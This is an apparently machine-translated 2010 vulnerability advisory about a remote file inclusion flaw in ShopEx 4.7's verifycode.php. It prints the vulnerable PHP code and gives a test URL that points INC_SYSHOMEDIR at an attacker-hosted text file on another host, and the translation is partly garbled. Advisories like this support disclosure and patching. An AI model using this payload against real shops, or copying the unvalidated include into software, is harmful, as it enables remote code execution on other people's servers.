ShopEx4. 7 and the following version remote include vulnerability-vulnerability warning-the black bar safety net

2010-03-08T00:00:00
ID MYHACK58:62201026350
Type myhack58
Reporter 佚名
Modified 2010-03-08T00:00:00

Description

ShopEx4. 7 and the following version remote include vulnerability Vulnerability description: verifycode.php

<? php / * * Login verification code generating file * * @package ShopEx online store system * @version 4.6 * @author ShopEx. cn <> * @url * @since PHP 4.3 * @copyright ShopEx. cn * / if (! defined("ISSHOP")) { Header("Location:../index.php"); exit; } / Call the session file / the include_once($INC_SYSHOMEDIR."include/session.inc.php"); mt_srand((double)microtime() * 1 0 0 0 0 0 0); / Generate the code / $strValidate = mt_rand(1 0 0 0, 9 9 9 9); session_unregister("RANDOM_CODE"); session_register("RANDOM_CODE"); $_SESSION["RANDOM_CODE"] = $strValidate.""; $verifyImg = newclass("verifyCode", $strValidate); / Output CAPTCHA image / $verifyImg->Output(); ?& gt; Test method: <http://www.hackqing.cn/shop/verifycode.php?INC_SYSHOMEDIR=http://www.hackqing.com/xx.txt>? Prevention recommendations: No Please refer to the official patch ShopEx. cn